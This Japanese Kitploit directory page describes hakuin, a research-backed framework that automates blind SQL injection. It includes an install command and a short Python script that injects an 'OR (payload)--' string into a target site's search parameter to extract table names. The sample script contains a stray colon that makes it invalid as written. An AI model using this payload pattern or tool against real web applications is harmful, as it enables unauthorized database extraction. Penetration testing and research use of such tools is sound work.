Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/pruzko/hakuin
脆弱性スキャナーウェブセキュリティペネトレーションテスト
GitHubpruzko/hakuin

hakuin

非常に高速で完全に設定可能なBlind SQL Injectionの最適化および自動化フレームワーク。

リポジトリを見る
141101年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Hakuinは、Python 3で書かれたBlind SQL Injection (BSQLI)の最適化および自動化フレームワークです。これは抽出ロジックを抽象化し、ユーザーが脆弱なWebアプリケーションからデータベースを簡単かつ効率的にダンプできるようにします。プロセスを高速化するために、Hakuinは事前学習済みおよび適応型言語モデル、日和見推測、統計モデリング、並列処理、三項クエリなど、さまざまな最適化手法を活用しています。

Hakuinは、高名な学術会議および産業会議で発表されています:

  • BSides, Bratislava, 2025
  • BlackHat MEA, Riyadh, 2023
  • Hack in the Box, Phuket, 2023
  • IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

詳細は、私たちの論文およびスライドをご覧ください。

インストール

Hakuinをインストールするには、次のコマンドを実行します:

root@kitploit:~
pip3 install hakuin

コマンドラインツール

Hakuinには、直感的なツールが付属しており、Hakuinのほとんどの機能をコマンドラインから直接利用できます:

root@kitploit:~
hk -h

カスタムスクリプト

場合によっては、BSQLIの脆弱性はコマンドラインから悪用するには難しすぎて、カスタムスクリプトが必要になります。ここでHakuinが真価を発揮し、インジェクションロジック、推論ロジック、さらにはクエリまで、あらゆるものをカスタマイズできます。

以下は最小限の例です:

root@kitploit:~
import asyncio
import aiohttp
from hakuin import Extractor, Requester

class SimpleRequester(Requester):
    async def request(self, query, ctx):
        payload = query.render(ctx)
        url = f'http://target.com/users?search=XXX" OR ({payload})--'
        async with aiohttp.request('GET', url) as resp:
            return resp.status == 200

async def main():
    requester = SimpleRequester():
    ext = Extractor(requester=requester, dbms='sqlite')
    data = await ext.extract_table_names()
    print(data)

asyncio.run(main())

必ずチュートリアルをご確認ください。

研究者向け

このリポジトリは、セキュリティ実務者のニーズに合わせて積極的に開発されています。私たちの論文に記載された実験を再現したい研究者は、凍結バージョンをインストールしてください。これには元のコード、実験スクリプト、結果を再現するための取扱説明書が含まれています。

Hakuinの引用方法

root@kitploit:~
@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}
ツールをダウンロード